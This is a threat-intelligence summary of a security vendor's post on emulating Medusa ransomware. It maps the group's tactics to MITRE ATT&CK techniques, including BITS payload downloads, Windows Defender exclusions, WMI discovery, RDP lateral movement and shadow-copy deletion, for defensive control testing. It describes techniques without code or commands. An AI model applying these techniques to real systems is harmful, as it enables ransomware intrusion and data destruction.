Medusa is a Windows-focused Ransomware-as-a-Service (RaaS) active since June 2021, with heightened activity after the launch of its Dedicated Leak Site in 2023. Security teams are encouraged to validate defenses against Medusa’s tactics using AttackIQ’s attack graph and related tools. #MedusaRansomware #MedusaBlog
Keypoints
- Medusa RaaS targets Windows and has been active since June 2021.
- Gained notoriety in early 2023 with the introduction of a Dedicated Leak Site (Medusa Blog).
- Should not be confused with MedusaLocker, another RaaS family active since 2019.
- Propagation methods include exploiting unpatched vulnerabilities and hijacking legitimate accounts (often via Initial Access Brokers).
- Employs Living-off-the-Land techniques to blend in with legitimate traffic.
- AttackIQ released an attack graph to help validate security controls against Medusa’s TTPs.
- Medusa uses ASPX web shells and BITSAdmin jobs for payload deployment and employs various WMI commands for discovery and lateral movement; encrypts files with RSA 2048 + AES 256 after deleting Volume Shadow Copies.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Propagation via exploiting vulnerable public-facing services; “Medusa is predominantly propagated through the exploitation of vulnerable services, such as public-facing assets or applications with known unpatched vulnerabilities…”
- [T1197] Bits Jobs – “This scenario executes bitsadmin to create a BITS job and configure it to download a remote payload.”
- [T1105] Ingress Tool Transfer – “These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious content.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – “This scenario uses the Add-MpPreference cmdlet to add the %TEMP%aiq-temp-exclusion directory path to the Windows Defender exclusion list.”
- [T1082] System Information Discovery – “This scenario executes the Win32_OperatingSystem WMI command to collect OS information.”
- [T1057] Process Discovery – “This scenario executes the Process WMI command to discover running processes.”
- [T1083] File and Directory Discovery – “This scenario uses the CIM_DataFile WMI Class to enumerate files on the Windows directory.”
- [T1087.001] Account Discovery: Local Account – “This scenario executes the useraccount WMI command to get a list of local accounts.”
- [T1087] Account Discovery – “This scenario executes the Win32_LogonSession WMI command to list logon sessions.”
- [T1016] System Network Configuration Discovery – “This scenario executes a set of WMI commands to obtain information about the system network configuration.”
- [T1018] Remote System Discovery – “This scenario performs a scan of the local network using Nmap to discover any remotely accessible system with ports 139, 445, or 3389 open.”
- [T1021.001] Remote Services: Remote Desktop Protocol – “This scenario attempts to move laterally within a network using the Remote Desktop Protocol (RDP).”
- [T1490] Inhibit System Recovery – “This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.”
- [T1486] Data Encrypted for Impact – “This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms.”
Indicators of Compromise
- [IOC] None mentioned – No IPs, domains, hashes, or filenames are cited in the article.
Read more: https://www.attackiq.com/2024/09/19/emulating-medusa-ransomware/